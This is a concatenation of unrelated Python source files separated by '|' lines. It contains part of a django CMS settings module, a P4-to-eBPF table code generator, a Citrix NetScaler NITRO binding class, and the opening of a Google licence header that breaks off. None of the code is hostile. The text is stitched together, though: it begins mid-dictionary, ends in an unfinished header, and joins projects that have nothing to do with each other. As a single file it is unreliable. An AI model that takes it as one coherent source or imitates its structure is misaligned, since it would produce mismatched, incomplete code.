    'MEDIA_PATH': 'cms/',
    'PAGE_MEDIA_PATH': 'cms_page_media/',
    'TITLE_CHARACTER': '+',
    'PAGE_CACHE': True,
    'PLACEHOLDER_CACHE': True,
    'PLUGIN_CACHE': True,
    'CACHE_PREFIX': 'cms-',
    'PLUGIN_PROCESSORS': [],
    'PLUGIN_CONTEXT_PROCESSORS': [],
    'UNIHANDECODE_VERSION': None,
    'UNIHANDECODE_DECODERS': ['ja', 'zh', 'kr', 'vn', 'diacritic'],
    'UNIHANDECODE_DEFAULT_DECODER': 'diacritic',
    'MAX_PAGE_PUBLISH_REVERSIONS': 10,
    'MAX_PAGE_HISTORY_REVERSIONS': 15,
    'TOOLBAR_ANONYMOUS_ON': True,
    'TOOLBAR_URL__EDIT_ON': 'edit',
    'TOOLBAR_URL__EDIT_OFF': 'edit_off',
    'TOOLBAR_URL__BUILD': 'build',
    'TOOLBAR_URL__DISABLE': 'toolbar_off',
    'ADMIN_NAMESPACE': 'admin',
    'APP_NAME': None,
    'TOOLBAR_HIDE': False,
    'INTERNAL_IPS': [],
    'REQUEST_IP_RESOLVER': 'cms.utils.request_ip_resolvers.default_request_ip_resolver',
    'PAGE_WIZARD_DEFAULT_TEMPLATE': constants.TEMPLATE_INHERITANCE_MAGIC,
    'PAGE_WIZARD_CONTENT_PLUGIN': 'TextPlugin',
    'PAGE_WIZARD_CONTENT_PLUGIN_BODY': 'body',
    'PAGE_WIZARD_CONTENT_PLACEHOLDER': None,  # Use first placeholder it finds.
}
def get_cache_durations():
    """
    Returns the setting: CMS_CACHE_DURATIONS or the defaults.
    """
    fallback = {
        'menus': 60 * 60,
        'content': 60,
        'permissions': 60 * 60,
    }
    return getattr(settings, 'CMS_CACHE_DURATIONS', fallback)
# Simple getters: each computes a derived default; the @default decorator is
# intended to let an explicitly configured Django setting of the given name
# take precedence over the computed value.

@default('CMS_MEDIA_ROOT')
def get_media_root():
    return os.path.join(settings.MEDIA_ROOT, get_cms_setting('MEDIA_PATH'))


@default('CMS_MEDIA_URL')
def get_media_url():
    return urljoin(settings.MEDIA_URL, get_cms_setting('MEDIA_PATH'))


@default('CMS_TOOLBAR_URL__EDIT_ON')
def get_toolbar_url__edit_on():
    return get_cms_setting('TOOLBAR_URL__EDIT_ON')


@default('CMS_TOOLBAR_URL__EDIT_OFF')
def get_toolbar_url__edit_off():
    return get_cms_setting('TOOLBAR_URL__EDIT_OFF')


@default('CMS_TOOLBAR_URL__BUILD')
def get_toolbar_url__build():
    return get_cms_setting('TOOLBAR_URL__BUILD')


@default('CMS_TOOLBAR_URL__DISABLE')
def get_toolbar_url__disable():
    return get_cms_setting('TOOLBAR_URL__DISABLE')
def get_templates():
    """Return the list of (template path, verbose name) choices for pages,
    from CMS_TEMPLATES_DIR or CMS_TEMPLATES, plus the inheritance magic entry."""
    from cms.utils.django_load import load_from_file
    if getattr(settings, 'CMS_TEMPLATES_DIR', False):
        tpldir = getattr(settings, 'CMS_TEMPLATES_DIR', False)
        # CMS_TEMPLATES_DIR can either be a string pointing to the templates directory
        # or a dictionary holding 'site: template dir' entries
        if isinstance(tpldir, dict):
            tpldir = tpldir[settings.SITE_ID]
        # We must extract the relative path of CMS_TEMPLATES_DIR to the nearest
        # valid templates directory. Here we mimic what the filesystem and
        # app_directories template loaders do
        prefix = ''
        # Relative to TEMPLATE['DIRS'] for filesystem loader
        path = [template['DIRS'][0] for template in settings.TEMPLATES]
        for basedir in path:
            if tpldir.find(basedir) == 0:
                prefix = tpldir.replace(basedir + os.sep, '')
                break
        # Relative to 'templates' directory that app_directory scans
        if not prefix:
            components = tpldir.split(os.sep)
            try:
                prefix = os.path.join(*components[components.index('templates') + 1:])
            except ValueError:
                # If templates is not found we use the directory name as prefix
                # and hope for the best
                prefix = os.path.basename(tpldir)
        config_path = os.path.join(tpldir, '__init__.py')
        # Try to load templates list and names from the template module
        # If module file is not present skip configuration and just dump the filenames as templates
        if os.path.isfile(config_path):
            template_module = load_from_file(config_path)
            templates = [(os.path.join(prefix, data[0].strip()), data[1]) for data in template_module.TEMPLATES.items()]
        else:
            templates = list((os.path.join(prefix, tpl), tpl) for tpl in os.listdir(tpldir))
    else:
        templates = list(getattr(settings, 'CMS_TEMPLATES', []))
    if get_cms_setting('TEMPLATE_INHERITANCE'):
        templates.append((constants.TEMPLATE_INHERITANCE_MAGIC, _('Inherit the template of the nearest ancestor')))
    return templates
def _ensure_languages_settings(languages):
    """Validate and normalize a CMS_LANGUAGES dict in place.

    Applies the 'default' entry's simple defaults to each language, computes
    fallbacks where missing, and marks the dict with the VERIFIED sentinel.

    :param languages: dict mapping site ids (and optionally 'default') to
                      lists of language dicts
    :raises ImproperlyConfigured: on structural or key errors
    """
    valid_language_keys = ['code', 'name', 'fallbacks', 'hide_untranslated', 'redirect_on_fallback', 'public']
    required_language_keys = ['code', 'name']
    simple_defaults = ['public', 'redirect_on_fallback', 'hide_untranslated']

    if not isinstance(languages, dict):
        raise ImproperlyConfigured(
            "CMS_LANGUAGES must be a dictionary with site IDs and 'default'"
            " as keys. Please check the format.")

    defaults = languages.pop('default', {})
    default_fallbacks = defaults.get('fallbacks')
    needs_fallbacks = []

    for key in defaults:
        if key not in valid_language_keys:
            raise ImproperlyConfigured("CMS_LANGUAGES has an invalid property in the default properties: %s" % key)

    # Any simple default not given explicitly defaults to True.
    for key in simple_defaults:
        if key not in defaults:
            defaults[key] = True

    for site, language_list in languages.items():
        # hash(int) == int, so this rejects any non-integer-like key.
        if site != hash(site):
            raise ImproperlyConfigured(
                "CMS_LANGUAGES can only be filled with integers (site IDs) and 'default'"
                " for default values. %s is not a valid key." % site)

        for language_object in language_list:
            for required_key in required_language_keys:
                if required_key not in language_object:
                    # Bug fix: report the key that is actually missing
                    # (previously interpolated the stale loop variable `key`).
                    raise ImproperlyConfigured("CMS_LANGUAGES has a language which is missing the required key %r "
                                               "in site %r" % (required_key, site))
            language_code = language_object['code']
            for key in language_object:
                if key not in valid_language_keys:
                    raise ImproperlyConfigured(
                        "CMS_LANGUAGES has invalid key %r in language %r in site %r" % (key, language_code, site)
                    )

            if 'fallbacks' not in language_object:
                if default_fallbacks:
                    language_object['fallbacks'] = default_fallbacks
                else:
                    # Defer: fallbacks depend on the site's public languages,
                    # which are only final after simple defaults are applied.
                    needs_fallbacks.append((site, language_object))
            for key in simple_defaults:
                if key not in language_object:
                    language_object[key] = defaults[key]

    site_fallbacks = {}
    for site, language_object in needs_fallbacks:
        if site not in site_fallbacks:
            site_fallbacks[site] = [lang['code'] for lang in languages[site] if lang['public']]
        # Fall back to every other public language of the same site.
        language_object['fallbacks'] = [lang_code for lang_code in site_fallbacks[site] if
                                        lang_code != language_object['code']]

    languages['default'] = defaults
    languages[VERIFIED] = True  # this will be busted by @override_settings and cause a re-check

    return languages
def get_languages():
    """Return the validated CMS_LANGUAGES configuration for this project."""
    site_id = settings.SITE_ID
    if site_id != hash(site_id):
        raise ImproperlyConfigured(
            "SITE_ID must be an integer"
        )
    if not settings.USE_I18N:
        # Single-language site: synthesize a minimal configuration.
        only_language = {'code': settings.LANGUAGE_CODE,
                         'name': settings.LANGUAGE_CODE}
        return _ensure_languages_settings({site_id: [only_language]})
    if settings.LANGUAGE_CODE not in dict(settings.LANGUAGES):
        raise ImproperlyConfigured(
            'LANGUAGE_CODE "%s" must have a matching entry in LANGUAGES' % settings.LANGUAGE_CODE
        )
    derived = {
        site_id: [{'code': code, 'name': _(name)}
                  for code, name in settings.LANGUAGES]
    }
    languages = getattr(settings, 'CMS_LANGUAGES', derived)
    if VERIFIED in languages:
        # Already validated (sentinel survives until settings are overridden).
        return languages
    return _ensure_languages_settings(languages)
def get_unihandecode_host():
    """Return CMS_UNIHANDECODE_HOST, normalized to end with a trailing slash
    (falsy values are passed through unchanged)."""
    host = getattr(settings, 'CMS_UNIHANDECODE_HOST', None)
    if not host:
        return host
    return host if host.endswith('/') else host + '/'
# Settings that need computation or validation: each maps to a zero-argument
# resolver called by get_cms_setting().
COMPLEX = {
    'CACHE_DURATIONS': get_cache_durations,
    'MEDIA_ROOT': get_media_root,
    'MEDIA_URL': get_media_url,
    # complex because not prefixed by CMS_
    'TEMPLATES': get_templates,
    'LANGUAGES': get_languages,
    'UNIHANDECODE_HOST': get_unihandecode_host,
    'CMS_TOOLBAR_URL__EDIT_ON': get_toolbar_url__edit_on,
    'CMS_TOOLBAR_URL__EDIT_OFF': get_toolbar_url__edit_off,
    'CMS_TOOLBAR_URL__BUILD': get_toolbar_url__build,
    'CMS_TOOLBAR_URL__DISABLE': get_toolbar_url__disable,
}

# Maps new setting short-name -> old CMS_* suffix still honored as a fallback.
DEPRECATED_CMS_SETTINGS = {
    # Old CMS_WIZARD_* settings to be removed in v3.5.0
    'PAGE_WIZARD_DEFAULT_TEMPLATE': 'WIZARD_DEFAULT_TEMPLATE',
    'PAGE_WIZARD_CONTENT_PLUGIN': 'WIZARD_CONTENT_PLUGIN',
    'PAGE_WIZARD_CONTENT_PLUGIN_BODY': 'WIZARD_CONTENT_PLUGIN_BODY',
    'PAGE_WIZARD_CONTENT_PLACEHOLDER': 'WIZARD_CONTENT_PLACEHOLDER',
}
def get_cms_setting(name):
    """Resolve the CMS setting *name*: computed resolvers first, then the
    CMS_<name> Django setting (with deprecated fallback), then DEFAULTS."""
    if name in COMPLEX:
        return COMPLEX[name]()
    prefixed = 'CMS_%s' % name
    if name in DEPRECATED_CMS_SETTINGS:
        # New name wins; old deprecated name is honored as a fallback.
        legacy = 'CMS_%s' % DEPRECATED_CMS_SETTINGS[name]
        return getattr(settings, prefixed, getattr(settings, legacy, DEFAULTS[name]))
    return getattr(settings, prefixed, DEFAULTS[name])
def get_site_id(site):
    """Coerce *site* (a Site instance, int, or int-like value) to a site id,
    falling back to settings.SITE_ID when it cannot be converted."""
    from django.contrib.sites.models import Site
    if isinstance(site, Site):
        return site.id
    try:
        return int(site)
    except (TypeError, ValueError):
        return settings.SITE_ID
|
|
# Copyright (c) Barefoot Networks, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
from p4_hlir.hlir import p4_match_type, p4_field, p4_table, p4_header_instance
from programSerializer import ProgramSerializer
from compilationException import *
import ebpfProgram
import ebpfInstance
import ebpfCounter
import ebpfStructType
import ebpfAction
class EbpfTableKeyField(object):
    """One field of a generated eBPF table key: records which header/metadata
    instance and field the value comes from, plus an optional match mask."""

    def __init__(self, fieldname, instance, field, mask):
        assert isinstance(instance, ebpfInstance.EbpfInstanceBase)
        assert isinstance(field, ebpfStructType.EbpfField)
        self.keyFieldName = fieldname   # member name inside the generated key struct
        self.instance = instance        # header/metadata instance the value is read from
        self.field = field              # field within that instance
        self.mask = mask                # optional mask (None = exact match)

    def serializeType(self, serializer):
        """Emit the struct-member declaration for this key field."""
        assert isinstance(serializer, ProgramSerializer)
        ftype = self.field.type
        serializer.emitIndent()
        ftype.declare(serializer, self.keyFieldName, False)
        serializer.endOfStatement(True)

    def serializeConstruction(self, keyName, serializer, program):
        """Emit C code copying the (masked) source field into the key named
        *keyName*."""
        assert isinstance(serializer, ProgramSerializer)
        assert isinstance(keyName, str)
        assert isinstance(program, ebpfProgram.EbpfProgram)

        if self.mask is not None:
            maskExpression = " & {0}".format(self.mask)
        else:
            maskExpression = ""

        # Metadata fields live in the metadata struct; header fields in the
        # header struct.
        if isinstance(self.instance, ebpfInstance.EbpfMetadata):
            base = program.metadataStructName
        else:
            base = program.headerStructName

        if isinstance(self.instance, ebpfInstance.SimpleInstance):
            source = "{0}.{1}.{2}".format(
                base, self.instance.name, self.field.name)
        else:
            # Header stacks are indexed arrays.
            assert isinstance(self.instance, ebpfInstance.EbpfHeaderStack)
            source = "{0}.{1}[{2}].{3}".format(
                base, self.instance.name,
                self.instance.hlirInstance.index, self.field.name)

        destination = "{0}.{1}".format(keyName, self.keyFieldName)
        size = self.field.widthInBits()

        serializer.emitIndent()
        if size <= 32:
            # Fits in a scalar: masked assignment with a cast.
            serializer.appendFormat("{0} = ({1}){2};",
                                    destination, source, maskExpression)
        else:
            if maskExpression != "":
                raise NotSupportedException(
                    "{0} Mask wider than 32 bits", self.field.hlirType)
            # Wide fields are copied byte-wise.
            # NOTE(review): `size / 8` is float division under Python 3 —
            # confirm this module targets Python 2, or use // instead.
            serializer.appendFormat(
                "memcpy(&{0}, &{1}, {2});", destination, source, size / 8)
        serializer.newline()
class EbpfTableKey(object):
    """The key of a P4 table, rendered as a C struct of key fields.

    Builds one EbpfTableKeyField per match field. Only exact-match and
    'valid' match types are supported; ternary/LPM/range are rejected.
    """

    def __init__(self, match_fields, program):
        assert isinstance(program, ebpfProgram.EbpfProgram)
        # NOTE(review): 'expressions' is never populated or read in this
        # module -- presumably vestigial or used elsewhere; confirm before
        # removing.
        self.expressions = []
        self.fields = []  # EbpfTableKeyField per match field
        self.masks = []   # mask per match field (parallel to 'fields')
        self.fieldNamePrefix = "key_field_"
        self.program = program
        fieldNumber = 0
        for f in match_fields:
            # Each hlir match field is a (field, match_type, mask) tuple.
            field = f[0]
            matchType = f[1]
            mask = f[2]
            if ((matchType is p4_match_type.P4_MATCH_TERNARY) or
                (matchType is p4_match_type.P4_MATCH_LPM) or
                (matchType is p4_match_type.P4_MATCH_RANGE)):
                # NOTE(review): the leading False argument differs from the
                # NotSupportedException call in EbpfTableKeyField -- confirm
                # the exception's expected signature.
                raise NotSupportedException(
                    False, "Match type {0}", matchType)
            if matchType is p4_match_type.P4_MATCH_VALID:
                # we should be really checking the valid field;
                # p4_field is a header instance
                assert isinstance(field, p4_header_instance)
                instance = field
                fieldname = "valid"
            else:
                assert isinstance(field, p4_field)
                instance = field.instance
                fieldname = field.name
            # Resolve the instance and its declared type: header stacks and
            # simple instances are looked up through different program maps.
            if ebpfProgram.EbpfProgram.isArrayElementInstance(instance):
                ebpfStack = program.getStackInstance(instance.base_name)
                assert isinstance(ebpfStack, ebpfInstance.EbpfHeaderStack)
                basetype = ebpfStack.basetype
                eInstance = program.getStackInstance(instance.base_name)
            else:
                ebpfHeader = program.getInstance(instance.name)
                assert isinstance(ebpfHeader, ebpfInstance.SimpleInstance)
                basetype = ebpfHeader.type
                eInstance = program.getInstance(instance.name)
            ebpfField = basetype.getField(fieldname)
            assert isinstance(ebpfField, ebpfStructType.EbpfField)
            # Generated members are named key_field_0, key_field_1, ...
            fieldName = self.fieldNamePrefix + str(fieldNumber)
            fieldNumber += 1
            keyField = EbpfTableKeyField(fieldName, eInstance, ebpfField, mask)
            self.fields.append(keyField)
            self.masks.append(mask)

    @staticmethod
    def fieldRank(field):
        """Sort key: the field type's alignment (see serializeType)."""
        assert isinstance(field, EbpfTableKeyField)
        return field.field.type.alignment()

    def serializeType(self, serializer, keyTypeName):
        """Emit 'struct <keyTypeName> { ... };' containing all key fields."""
        assert isinstance(serializer, ProgramSerializer)
        serializer.emitIndent()
        serializer.appendFormat("struct {0} ", keyTypeName)
        serializer.blockStart()
        # Sort fields in decreasing size; this will ensure that
        # there is no padding.
        # Padding may cause the ebpf verification to fail,
        # since padding fields are not initialized
        fieldOrder = sorted(
            self.fields, key=EbpfTableKey.fieldRank, reverse=True)
        for f in fieldOrder:
            assert isinstance(f, EbpfTableKeyField)
            f.serializeType(serializer)
        serializer.blockEnd(False)
        serializer.endOfStatement(True)

    def serializeConstruction(self, serializer, keyName, program):
        """Emit the C statements that fill in every field of the key."""
        serializer.emitIndent()
        serializer.appendLine("/* construct key */")
        for f in self.fields:
            f.serializeConstruction(keyName, serializer, program)
class EbpfTable(object):
    """A P4 table translated to a pair of eBPF maps.

    One data map (key -> action value) plus a one-entry 'miss' map holding
    the default action. Emits the C type declarations, map declarations,
    and the lookup/dispatch code for the table.
    """

    # noinspection PyUnresolvedReferences
    def __init__(self, hlirtable, program, config):
        assert isinstance(hlirtable, p4_table)
        assert isinstance(program, ebpfProgram.EbpfProgram)
        self.name = hlirtable.name
        self.hlirtable = hlirtable
        self.config = config
        # Single-entry map holding the default (miss) action value.
        self.defaultActionMapName = (program.reservedPrefix +
                                     self.name + "_miss")
        self.key = EbpfTableKey(hlirtable.match_fields, program)
        self.size = hlirtable.max_size
        if self.size is None:
            program.emitWarning(
                "{0} does not specify a max_size; using 1024", hlirtable)
            self.size = 1024
        self.isHash = True # TODO: try to guess arrays when possible
        self.dataMapName = self.name
        # Fresh C identifiers for the generated enum/struct types.
        self.actionEnumName = program.generateNewName(self.name + "_actions")
        self.keyTypeName = program.generateNewName(self.name + "_key")
        self.valueTypeName = program.generateNewName(self.name + "_value")
        self.actions = []
        if hlirtable.action_profile is not None:
            raise NotSupportedException("{0}: action_profile tables",
                                        hlirtable)
        if hlirtable.support_timeout:
            program.emitWarning("{0}: table timeout {1}; ignoring",
                                hlirtable, NotSupportedException.archError)
        self.counters = []
        if (hlirtable.attached_counters is not None):
            for c in hlirtable.attached_counters:
                ctr = program.getCounter(c.name)
                assert isinstance(ctr, ebpfCounter.EbpfCounter)
                self.counters.append(ctr)
        # Meters and registers are not supported; warn and continue.
        if (len(hlirtable.attached_meters) > 0 or
            len(hlirtable.attached_registers) > 0):
            program.emitWarning("{0}: meters/registers {1}; ignored",
                                hlirtable, NotSupportedException.archError)
        for a in hlirtable.actions:
            action = program.getAction(a)
            self.actions.append(action)

    def serializeKeyType(self, serializer):
        """Emit the C struct declaration for the table key."""
        assert isinstance(serializer, ProgramSerializer)
        self.key.serializeType(serializer, self.keyTypeName)

    def serializeActionArguments(self, serializer, action):
        """Emit the per-action argument struct (a member of the value union)."""
        assert isinstance(serializer, ProgramSerializer)
        assert isinstance(action, ebpfAction.EbpfActionBase)
        action.serializeArgumentsAsStruct(serializer)

    def serializeValueType(self, serializer):
        """Emit the action enum and the tagged-union value struct."""
        assert isinstance(serializer, ProgramSerializer)
        # create an enum with tags for all actions
        serializer.emitIndent()
        serializer.appendFormat("enum {0} ", self.actionEnumName)
        serializer.blockStart()
        for a in self.actions:
            name = a.name
            serializer.emitIndent()
            serializer.appendFormat("{0}_{1},", self.name, name)
            serializer.newline()
        serializer.blockEnd(False)
        serializer.endOfStatement(True)
        # a type-safe union: a struct with a tag and an union
        serializer.emitIndent()
        serializer.appendFormat("struct {0} ", self.valueTypeName)
        serializer.blockStart()
        serializer.emitIndent()
        #serializer.appendFormat("enum {0} action;", self.actionEnumName)
        # temporary workaround for a bcc bug: use a plain unsigned int
        # instead of the enum type for the tag
        serializer.appendFormat("{0}32 action;",
                                self.config.uprefix)
        serializer.newline()
        serializer.emitIndent()
        serializer.append("union ")
        serializer.blockStart()
        for a in self.actions:
            self.serializeActionArguments(serializer, a)
        serializer.blockEnd(False)
        serializer.space()
        serializer.appendLine("u;")
        serializer.blockEnd(False)
        serializer.endOfStatement(True)

    def serialize(self, serializer, program):
        """Emit the type declarations and both map declarations."""
        assert isinstance(serializer, ProgramSerializer)
        assert isinstance(program, ebpfProgram.EbpfProgram)
        self.serializeKeyType(serializer)
        self.serializeValueType(serializer)
        self.config.serializeTableDeclaration(
            serializer, self.dataMapName, self.isHash,
            "struct " + self.keyTypeName,
            "struct " + self.valueTypeName, self.size)
        # Miss map: a 1-entry array indexed by the zero key.
        self.config.serializeTableDeclaration(
            serializer, self.defaultActionMapName, False,
            program.arrayIndexType, "struct " + self.valueTypeName, 1)

    def serializeCode(self, serializer, program, nextNode):
        """Emit the table's runtime code: build key, look up, run action,
        then branch to the next node (hit/miss or fall-through)."""
        assert isinstance(serializer, ProgramSerializer)
        assert isinstance(program, ebpfProgram.EbpfProgram)
        hitVarName = program.reservedPrefix + "hit"
        keyname = "key"
        valueName = "value"
        serializer.newline()
        serializer.emitIndent()
        serializer.appendFormat("{0}:", program.getLabel(self))
        serializer.newline()
        serializer.emitIndent()
        serializer.blockStart()
        serializer.emitIndent()
        serializer.appendFormat("{0}8 {1};", program.config.uprefix, hitVarName)
        serializer.newline()
        serializer.emitIndent()
        serializer.appendFormat("struct {0} {1} = {{}};", self.keyTypeName, keyname)
        serializer.newline()
        serializer.emitIndent()
        serializer.appendFormat(
            "struct {0} *{1};", self.valueTypeName, valueName)
        serializer.newline()
        self.key.serializeConstruction(serializer, keyname, program)
        serializer.emitIndent()
        serializer.appendFormat("{0} = 1;", hitVarName)
        serializer.newline()
        serializer.emitIndent()
        serializer.appendLine("/* perform lookup */")
        serializer.emitIndent()
        program.config.serializeLookup(
            serializer, self.dataMapName, keyname, valueName)
        serializer.newline()
        serializer.emitIndent()
        serializer.appendFormat("if ({0} == NULL) ", valueName)
        serializer.blockStart()
        serializer.emitIndent()
        serializer.appendFormat("{0} = 0;", hitVarName)
        serializer.newline()
        serializer.emitIndent()
        serializer.appendLine("/* miss; find default action */")
        serializer.emitIndent()
        program.config.serializeLookup(
            serializer, self.defaultActionMapName,
            program.zeroKeyName, valueName)
        serializer.newline()
        serializer.blockEnd(True)
        # On a hit, bump every auto-incrementing counter attached to us.
        if len(self.counters) > 0:
            serializer.emitIndent()
            serializer.append("else ")
            serializer.blockStart()
            for c in self.counters:
                assert isinstance(c, ebpfCounter.EbpfCounter)
                if c.autoIncrement:
                    serializer.emitIndent()
                    serializer.blockStart()
                    c.serializeCode(keyname, serializer, program)
                    serializer.blockEnd(True)
            serializer.blockEnd(True)
        serializer.emitIndent()
        serializer.appendFormat("if ({0} != NULL) ", valueName)
        serializer.blockStart()
        serializer.emitIndent()
        serializer.appendLine("/* run action */")
        self.runAction(serializer, self.name, valueName, program, nextNode)
        # NOTE(review): this rebinding shadows the 'nextNode' parameter, so
        # the 'node = nextNode' fallbacks below assign the next_ dict itself
        # (not the caller-supplied fall-through node) when next_["hit"] or
        # next_["miss"] is None. Looks suspicious -- confirm intent.
        nextNode = self.hlirtable.next_
        if "hit" in nextNode:
            node = nextNode["hit"]
            if node is None:
                node = nextNode
            label = program.getLabel(node)
            serializer.emitIndent()
            serializer.appendFormat("if (hit) goto {0};", label)
            serializer.newline()
            node = nextNode["miss"]
            if node is None:
                node = nextNode
            label = program.getLabel(node)
            serializer.emitIndent()
            serializer.appendFormat("else goto {0};", label)
            serializer.newline()
        serializer.blockEnd(True)
        if not "hit" in nextNode:
            # Catch-all
            serializer.emitIndent()
            serializer.appendFormat("goto end;")
            serializer.newline()
        serializer.blockEnd(True)

    def runAction(self, serializer, tableName, valueName, program, nextNode):
        """Emit the switch over the matched value's action tag; each case
        runs the action body and jumps to that action's successor node."""
        serializer.emitIndent()
        serializer.appendFormat("switch ({0}->action) ", valueName)
        serializer.blockStart()
        for a in self.actions:
            assert isinstance(a, ebpfAction.EbpfActionBase)
            serializer.emitIndent()
            serializer.appendFormat("case {0}_{1}: ", tableName, a.name)
            serializer.newline()
            serializer.emitIndent()
            serializer.blockStart()
            a.serializeBody(serializer, valueName, program)
            serializer.blockEnd(True)
            serializer.emitIndent()
            nextNodes = self.hlirtable.next_
            if a.hliraction in nextNodes:
                # Per-action successor; fall back to the caller's nextNode
                # when the table maps this action to None.
                node = nextNodes[a.hliraction]
                if node is None:
                    node = nextNode
                label = program.getLabel(node)
                serializer.appendFormat("goto {0};", label)
            else:
                serializer.appendFormat("break;")
            serializer.newline()
        serializer.blockEnd(True)
|
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class aaagroup_auditsyslogpolicy_binding(base_resource) :
	""" Binding class showing the auditsyslogpolicy that can be bound to aaagroup.

	Generated NITRO SDK code: the try/except blocks that merely re-raise
	are the generator's boilerplate pattern, kept as-is.
	"""
	def __init__(self) :
		# Backing attributes for the properties below.
		self._policy = ""
		self._priority = 0
		self._acttype = 0
		self._groupname = ""
		# Record count returned by count()/count_filtered() queries.
		self.___count = 0

	@property
	def priority(self) :
		ur"""Priority to assign to the policy, as an integer. A lower number indicates a higher priority.
		Required when binding a group to a policy. Not relevant to any other
		type of group binding.
		"""
		try :
			return self._priority
		except Exception as e:
			raise e

	@priority.setter
	def priority(self, priority) :
		ur"""Priority to assign to the policy, as an integer. A lower number indicates a higher priority.
		Required when binding a group to a policy. Not relevant to any other
		type of group binding.
		"""
		try :
			self._priority = priority
		except Exception as e:
			raise e

	@property
	def policy(self) :
		ur"""The policy name.
		"""
		try :
			return self._policy
		except Exception as e:
			raise e

	@policy.setter
	def policy(self, policy) :
		ur"""The policy name.
		"""
		try :
			self._policy = policy
		except Exception as e:
			raise e

	@property
	def groupname(self) :
		ur"""Name of the group that you are binding.<br/>Minimum length = 1.
		"""
		try :
			return self._groupname
		except Exception as e:
			raise e

	@groupname.setter
	def groupname(self, groupname) :
		ur"""Name of the group that you are binding.<br/>Minimum length = 1
		"""
		try :
			self._groupname = groupname
		except Exception as e:
			raise e

	@property
	def acttype(self) :
		# Read-only: set from server responses, never sent by the client.
		try :
			return self._acttype
		except Exception as e:
			raise e

	def _get_nitro_response(self, service, response) :
		ur""" converts nitro response into object and returns the object array in case of get request.
		"""
		try :
			result = service.payload_formatter.string_to_resource(aaagroup_auditsyslogpolicy_binding_response, response, self.__class__.__name__)
			if(result.errorcode != 0) :
				# 444 means the session expired; drop it before raising.
				if (result.errorcode == 444) :
					service.clear_session(self)
				if result.severity :
					if (result.severity == "ERROR") :
						raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
				else :
					raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
			return result.aaagroup_auditsyslogpolicy_binding
		except Exception as e :
			raise e

	def _get_object_name(self) :
		ur""" Returns the value of object identifier argument
		"""
		try :
			if self.groupname is not None :
				return str(self.groupname)
			return None
		except Exception as e :
			raise e

	@classmethod
	def add(cls, client, resource) :
		ur""" Use this API to add (bind) one binding or a list of bindings.
		"""
		try :
			if resource and type(resource) is not list :
				updateresource = aaagroup_auditsyslogpolicy_binding()
				updateresource.groupname = resource.groupname
				updateresource.policy = resource.policy
				updateresource.priority = resource.priority
				return updateresource.update_resource(client)
			else :
				if resource and len(resource) > 0 :
					updateresources = [aaagroup_auditsyslogpolicy_binding() for _ in range(len(resource))]
					for i in range(len(resource)) :
						updateresources[i].groupname = resource[i].groupname
						updateresources[i].policy = resource[i].policy
						updateresources[i].priority = resource[i].priority
				return cls.update_bulk_request(client, updateresources)
		except Exception as e :
			raise e

	@classmethod
	def delete(cls, client, resource) :
		ur""" Use this API to delete (unbind) one binding or a list of bindings.
		"""
		try :
			if resource and type(resource) is not list :
				deleteresource = aaagroup_auditsyslogpolicy_binding()
				deleteresource.groupname = resource.groupname
				deleteresource.policy = resource.policy
				return deleteresource.delete_resource(client)
			else :
				if resource and len(resource) > 0 :
					deleteresources = [aaagroup_auditsyslogpolicy_binding() for _ in range(len(resource))]
					for i in range(len(resource)) :
						deleteresources[i].groupname = resource[i].groupname
						deleteresources[i].policy = resource[i].policy
				return cls.delete_bulk_request(client, deleteresources)
		except Exception as e :
			raise e

	@classmethod
	def get(cls, service, groupname) :
		ur""" Use this API to fetch aaagroup_auditsyslogpolicy_binding resources.
		"""
		try :
			obj = aaagroup_auditsyslogpolicy_binding()
			obj.groupname = groupname
			response = obj.get_resources(service)
			return response
		except Exception as e:
			raise e

	@classmethod
	def get_filtered(cls, service, groupname, filter_) :
		ur""" Use this API to fetch filtered set of aaagroup_auditsyslogpolicy_binding resources.
		Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
		"""
		try :
			obj = aaagroup_auditsyslogpolicy_binding()
			obj.groupname = groupname
			option_ = options()
			option_.filter = filter_
			response = obj.getfiltered(service, option_)
			return response
		except Exception as e:
			raise e

	@classmethod
	def count(cls, service, groupname) :
		ur""" Use this API to count aaagroup_auditsyslogpolicy_binding resources configured on NetScaler.
		"""
		try :
			obj = aaagroup_auditsyslogpolicy_binding()
			obj.groupname = groupname
			option_ = options()
			option_.count = True
			response = obj.get_resources(service, option_)
			if response :
				return response[0].__dict__['___count']
			return 0
		except Exception as e:
			raise e

	@classmethod
	def count_filtered(cls, service, groupname, filter_) :
		ur""" Use this API to count the filtered set of aaagroup_auditsyslogpolicy_binding resources.
		Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
		"""
		try :
			obj = aaagroup_auditsyslogpolicy_binding()
			obj.groupname = groupname
			option_ = options()
			option_.count = True
			option_.filter = filter_
			response = obj.getfiltered(service, option_)
			if response :
				return response[0].__dict__['___count']
			return 0
		except Exception as e:
			raise e
class aaagroup_auditsyslogpolicy_binding_response(base_response) :
	""" Response wrapper for aaagroup_auditsyslogpolicy_binding API calls.

	Holds the NITRO status fields plus the array of decoded binding
	objects, pre-sized to 'length'.
	"""
	def __init__(self, length=1) :
		self.errorcode = 0
		self.message = ""
		self.severity = ""
		self.sessionid = ""
		# Pre-allocate one binding object per expected record.
		# (The original code first assigned [] and then immediately
		# overwrote it; the dead assignment has been removed.)
		self.aaagroup_auditsyslogpolicy_binding = [aaagroup_auditsyslogpolicy_binding() for _ in range(length)]
|
|
#!/usr/bin/python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
